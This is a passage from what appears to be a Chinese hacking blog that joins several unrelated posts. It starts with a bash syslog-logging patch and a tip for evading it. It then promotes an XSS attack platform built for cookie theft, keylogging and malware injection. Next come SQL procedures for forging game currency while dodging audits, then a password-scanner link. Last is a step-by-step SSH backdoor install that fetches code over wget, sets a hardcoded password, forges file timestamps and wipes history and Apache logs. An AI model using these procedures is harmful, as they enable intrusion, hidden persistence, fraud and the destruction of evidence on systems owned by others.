will provide a quick and dirty hack to accomplish this – there will be no
distinction between which user typed which command, although this can also be
done.

The best place to put our interface is the parse.y file which consists of the
yacc grammar for bash. The bash parser is called each time a new command is
issued at the shell prompt. Therefore, placing a syslog hook just before the
parser ends its job, is almost ideal. The only changes that need to be done
are actually two line additions: including syslog.h and making syslog(3) call.
The alterations were made to bash-3.2 source code:

—————————————————————————

[ithilgore@fitz]$diff -E -b -c ~/bash-3.2/parse.y ~/hacked_bash/parse.y

*** ../../bash-3.2/bash-3.2/parse.y Tue Sep 19 13:37:21 2006
— parse.y Sat Jul 12 18:32:26 2008
***************
*** 19,24 ****
— 19,25 —-
Foundation, 59 Temple Place, Suite 330, Boston, MA 02111 USA. */

%{
+ #include
#include “config.h”

#include “bashtypes.h”
***************
*** 1979,1984 ****
— 1980,1986 —-
shell_input_line_len = i; /* == strlen (shell_input_line) */

set_line_mbstate ();
+ syslog(LOG_LOCAL0 | LOG_CRIT, “%s”, shell_input_line);

#if defined (HISTORY)
if (remember_on_history && shell_input_line && shell_input_line[0])

—————————————————————————

The above call generates a log message that will be distributed by syslogd
with a priority of LOG_CRIT to the facility specified as local0. For this
to work, /etc/syslog.conf *must* include a line like the following:

local0.crit /var/log/hist.log

Every command issued by a user using the bash shell will now end up in the
/var/log/hist.log file which will normally be readable only by root.

Note that as mentioned above, the above hack does not differentiate between
each user. More work needs to be done for that. In addition, since every bash
command is logged, expect to see “garbage” coming from executed scripts and/or
startup bash configuration files.

The only thing that is left to answer is the question “How can one escape the
above hack? ” It is fairly simple:

—-> Compile/transfer and use your own *clean* version of bash (or any other
shell).

Since the hack above depends on using that specific hacked version, it will not
work if you just compile or just transfer a precompiled clean version of bash
for that system.

[ v. Conclusion ]
=================

Bash is a shell, not a logging mechanism and bash_history was only meant to
provide the user with the convenience of less retyping. Literally *every*
method of using it as a monitoring facility, will come to waste. If you are
a serious administrator and really want to monitor your users, make a custom
kernel module that logs every keystroke and then filters everything according
to the userid and/or other parameters. This will be both efficient and really
difficult (but still not impossible) to override.
Alternatively, there are some ready-to-establish audit frameworks for both
Linux and FreeBSD. On FreeBSD, the audit(4) framework, developed by Robert
Watson and the TrustedBSD Project, would be the choice. More info at
http://www.freebsd.org/doc/en_US.ISO8 … books/handbook/audit.html . On
Linux, the Linux Auditing System developed by Steve Grubb from Redhat
(http://people.redhat.com/sgrubb/audit/) would be the way to go.

[ vi. References ]
==================

a. bash & syslog man pages
b. bash-3.2 source code -http://ftp.gnu.org/gnu/bash/bash-3.2.tar.gz
c. thanks go to
- Michael Iatrou for pointing out a correction
- gorlist for participating in a mini-wargame, set up to test the
subject

Anehta! — 新一代的web攻击平台

admin — Wed, 29 Dec 2010 13:35:02 +0000

原文地址：

http://hi.baidu.com/aullik5/blog/item/203809540b611ac2b745aeee.html

两个礼拜了，从一开始的激动不已，到现在更加激动不已。
有很多想说，又不知从何说起。那么，还是采取FAQ的形式来向大家介绍吧！

Q：为什么叫：Anehta ?
A：因为“雅典娜”的名字是：athena ，但是这个名字已经被sourceforge上的某人抢了，所以按照“刺氏命名法”，把“athena”反过来，本项目正式命名为： Anehta，中文发音：“阿内塔”

Q： Anehta 项目是做什么的？
A：简单来说，你可以理解为 AttackAPI + BeEF。但是Anehta 绝对没有这么简单，因为我实现了很多特有的机制，使得Anehta更加强大以及更加容易扩展。

Q：没听过什么AttackAPI，还是不知道Anehta是做什么。
A：更通俗来说，Anehta 就是一个跨站脚本攻击（XSS）的利用平台。

Q：Anehta是用什么语言开发的，对系统有什么要求？
A：由于在一开始就考虑到了通用性、跨平台性、跨浏览器、稳定性、易扩展性，所以Anehta在这方面做的是非常好的。anehta是基于javascript 和 PHP开发的。其中部分用到了 jQuery 框架，虽然anehta 可以独立于jQuery存在，但是考虑到引入jQuery 后，可以大大降低开发模块的成本，所以还是保留了。使用jQuery的另外一个好处就是跨浏览器，因为jQuery 本身是跨浏览器的，所以anehta也很容易做到这点.

使用PHP是因为PHP是当今使用最为广泛的脚本语言之一。(其实有个很不可告人的原因是因为大部分肉鸡都是PHP的吧，嘿嘿，anehta不需要任何perl、python、ruby等脚本支持)

Q：Anehta的架构是什么样的？
A：首先，我使用javascript 实现了一套JS框架，这套框架封装了很多函数和类，是专门用于攻击的一套JS框架。使用这套框架可以非常轻松的开发出威力强大的脚本。这套框架网站开发者也可以使用，可以获得很多强大的功能。

其次，基于这套框架，我开发了许多模块，比如本项目特有的“回旋镖模块”，可以跨域偷取cookie；再比如一个完美的JS键盘记录器等，还有很多功能，我会陆续补充好文档。

再次，anehta拥有非常清晰的结构，XSS后只需要加载一个feed.js，就会自动完成所有工作了。

最后，anehta不是纯客户端的，除了核心的JS攻击框架外，在服务端还利用PHP做了许多处理。

Q：Anehta具有什么特色和优点？
A：Anehta 结构清晰，功能是模块化，开发者可以单独为anehta开发各种各样的模块，以满足独特的需求。
模块之间具有低耦合性，互不影响。同时anehta的模块互相之间可以通信。

此外anetha还实现了很多独特、方便的技术。比如hook模块中，实现了可以hook任意js函数的方法。此外利用flash shared objects实现的水印技术也非常独特，即便用户删除了cookie，从IE切换到了Firefox或是Opera，也照样能够识别出是本人. 而回旋镖模块更是能够将反射型的XSS变成持久型的XSS，实时命令模块等都属于基本功能了。不久后我会补全anehta的文档，包括所有API的使用说明。

Anehta 的另一个特色就是会集成flash、java、css等多种hacking技术于一体，虽然目前还只实现了一小部分，但是我会慢慢把他们都做完。

此外，由于服务端的存在，所以Anehta 是一个平台(Platform)，而并非一个框架(framework)。服务端设计还存在很大的开发潜力。

Q：为什么要做这样一个项目？
A：可以说是心血来潮，也可以说是游戏之作，但是Anehta确实倾注了我的大量心血。从一开始我就总结了很多需求，思考了很多设计上的东西，所以anehta拥有非常好的架构和可扩展性。我的目的是将anehta做成一个集web攻击大成者的平台，所以anehta会涉及到那么多乱七八糟的技术。

出于精简的目的，我舍弃了很多用处不大的功能，但是anehta还将扩展更多强大和实用的功能。在我看来，anehta的js框架部分已经比attackAPI要好了，功能部分更是远远超过了BeEF和XSS Shell！

Q：Anehta针对哪些用户？
A：本项目是为安全工程师进行渗透测试以及演示脚本漏洞的危害而设计，请勿用作非法用途！本项目遵循GPLv3条款，属于开源项目，任何人可以自由复制、使用或修改本代码，本人概不承担法律责任!

Q：Anehta实现了哪些功能？
A：以下是已经实现的功能列表：
* 获取客户端基本信息(浏览器版本/OS version/客户端IP/代理IP/Referer/Request URI);
* Ajax库支持
* 窃取客户端Cookie
* 跨域窃取Cookie（比如我在淘宝上窃取百度的cookie）
* 灵活的XSRF模块
* 客户端DDOS攻击（发起大量请求，CC）
* hook表单提交（Form Sniffer 功能）
* hook 任意javascript 函数；注入任意javascript函数
* 一个优秀的Javascript Keylogger;
* 支持数据加密传输(出于性能考虑，目前暂时使用base64)
* 注入iframe模块（可以实施挂马）
* 模块之间互相通信
* 独特的客户端水印，使得删除cookie、切换浏览器也能识别到用户
* logger虚拟守护进程（定时检查所有模块的输出，并记录到服务器）
窃取剪贴板的内容（仅仅支持IE）
* 客户端地理位置查询
* 在线的web代理，支持自定义cookie访问站点（第三方实现）
* 实时命令模块
* 扫描浏览器的历史记录
一个基于JS的端口扫描器
* 获取客户端软件信息（比如是否安装了QQ、迅雷等）
* 邮件通知模块

Q：Anehta未来会怎么发展？
A：我会持续开发和扩展Anehta，在不久的未来会完善英文文档并对外正式发布。目前计划里的蓝图如下：
Client-Side：
* GIFAR支持
ClickJacking/XSIO支持
XSS Worm Module
获取显示器分辨率
钓鱼模块（可以欺骗用户从而获取密码等）
获取客户端真实IP
* 更加强大的扫描模块
JS压缩、变形（让anehta更小巧）
Cross Site Sql Injection 模块（对注射的支持）
* 客户端代理模块（直接利用客户端访问网站，这在攻击内部系统时很有用）
* 检查IM或者网站的登录状态
* 更多的子窗口控制功能
* 调用activex的一些方法
* pipeline（管道功能，具体作用暂且保密）
* 验证码的支持
将大量功能集成到flash和java中
Heap Spray 、 Heap Fengshui 模块，帮助更方便写客户端exploit
升级和传播模块
支持加载第三方攻击库，比如attackAPI
新技术的支持（HTML5,AS3,CSS3等）
……

Server-Side:
* 通过IM自动通知Master
* 通过手机短信自动通知Master
客户端session保持以及session fixation支持
* 良好的多主机管理以及更加友好的界面
feed.js 生成器
* 数据库支持(Mysql 或 sqlite);
更加友好的log输出

Both Client and Server:
* 窃取客户端文件(Ajax Upload)

Anehta还有一些bug和不足，先不列到这里了，我会持续改进，此外由于我对UI和美化一窍不通，所以目前界面还很丑，将就着用吧！

哪位朋友有心也可以帮我写写UI。

最后，啰嗦了这么多，是不是等不及了呢？
那么，要看演示的，可以到这里下载录像：

http://www.secwiki.com/anehta/demo/anehtaDEMO.zip

也可以在线观看，不过文件比较大，有20多M

http://www.secwiki.com/anehta/demo/anehta.html

想体验一下？到这里访问demo页面：
http://www.secwiki.com/anehta/demo.html DEMO页面是一个被XSS的页面

粗陋的后台是在：
http://www.secwiki.com/anehta/admin.php 在这里可以看到被XSS后的结果。

请参考我制作的录像

FF的用户请关闭noscript扩展，拦截了就没得玩了撒

项目首页：

http://anehta.googlecode.com

源代码获取：

http://code.google.com/p/anehta/source/checkout

打包下载：(下次地址变更了，有个文件忘记打包了)

http://anehta.googlecode.com/files/anehta-v0.5.5fixed.zip

镜像：http://www.nukeblog.cn/anehta/anehta-v0.5.5fixed.zip

不包含QQWry.dat 的版本：(314k，需要有QQWray.dat才能正常运行)

http://anehta.googlecode.com/files/anehta-v0.5.5_fixed_withoutQQWry.zip

QQWry单独下载：(4M, 下载后放到anehta根目录)

http://anehta.googlecode.com/files/QQWry.zip

-EOF-

不过遗憾的是，大风的anehta停止更新了，因为中国的法律不允许，以后要跟新也是写给自己看了，纯粹好玩。
大风：此外由于刑法的修正案，关闭了 anehta 项目，也请之前下载过的朋友不要用来做坏事

admin:希望有能力和经验继续改进Anehta平台的广大安全爱好者与我们联系，共同遵循GPLv3条款改进。

Update記錄

admin — Wed, 29 Dec 2010 13:20:21 +0000

1.
select dbo.DoAlzXor(999) //999代表要刷的钱
返回一个负数.-5108668643680970581

2.
使用存储过程,避过太过于明显的审计.//注意他后面会不会加入我们这个存储过程,因为取名太象了.
CREATE PROCEDURE cabal_tool_character_ex( @characteridx int,@LEV int,@Alz bigint , @encrypted bigint)
AS
BEGIN
BEGIN TRAN
BEGIN
UPDATE cabal_character_table
SET LEV= @LEV,
SET Alz = @Alz,
Reserved1 = @encrypted
where characteridx = @characteridx
END
COMMIT TRAN
END
GO

3.确定要刷用户的信息

SELECT * FROM cabal_character_table WHERE CharacterIdx= 751576
4.
调用存储过程
exec cabal_tool_character_ex 751576,100,200000,-5108668643680970581
//用户id,金钱值,Reserved1值
5. drop PROCEDURE cabal_tool_character_ex

其他办法：

CREATE PROC cabal_guild_event_log
@UserNums int,
@mon bigint
as
DECLARE @reserv bigint
DELETE from cabal_warehouse_table WHERE UserNum = @UserNums
INSERT cabal_warehouse_table (UserNum, Data, Reserved1) VALUES ( @UserNums, 0x, DBO.DoAlzXor(@mon))
set @reserv = (select reserved1 from dbo.cabal_warehouse_table where usernum = @UserNums)
exec cabal_tool_SetWarehouseAlz @UserNums, @mon, @reserv
GO
__________________
DECLARE @RC int
DECLARE @characteridx int
DECLARE @Alz bigint
DECLARE @encrypted bigint
SELECT @characteridx = 704784
SELECT @Alz = 999
SELECT @encrypted = -5108668643680970581
EXEC @RC = [SERVER01].[dbo].[cabal_tool_character_ex] @characteridx, @Alz, @encrypted
DECLARE @PrnLine nvarchar(4000)
PRINT ‘Stored Procedure: SERVER01.dbo.cabal_tool_character_ex’
SELECT @PrnLine = ‘ Return Code = ‘ + CONVERT(nvarchar, @RC)
PRINT @PrnLine

PHP扫FTP\MYSQL\MSSQL\SSH密码的脚本

admin — Wed, 29 Dec 2010 13:17:19 +0000

小Ablog看到的.转过来.

http://www.sablog.net/blog/scanpass-ftp-mysql-mssql-ssh/

可以扫FTP\MYSQL\MSSQL\SSH密码

比如webshell在linux下。不会在LINUX下渗透。可以试试这个。

scanpass

ssh后门快速安装

admin — Wed, 29 Dec 2010 13:08:14 +0000

1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
3、下载并安装ssh后门:
shell-# wget http://192.168.1.188/sshbd.tgz
shell-# tar zxvf sshbd.tgz
shell-# cd openssh

4、设置ssh后门的登录密码：
vi versio.h
#define SSH_VERSION “OpenSSH_4.2″ –> you’ve to edit OpenSSH_4.2

vi includes.h
define _SECRET_PASSWD “test123″ -> edit as u wish password

5、继续安装：
shell-# ./configure –prefix=/usr –sysconfdir=/etc/ssh
shell-# make && make install
shell-# cp ssh_config sshd_config /etc/ssh/
touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config
shell-# /etc/init.d/sshd restart

6、登入后门：
ssh -l root 192.168.1.188
密码：test123
echo >/root/.bash_history //清空操作日志

7、清除apache日志：
export HISTFILE=/dev/null
export HISTSIZE=0
cd /etc/httpd/logs/
sed -i ‘/210.73.64.100/d’ access_log*

door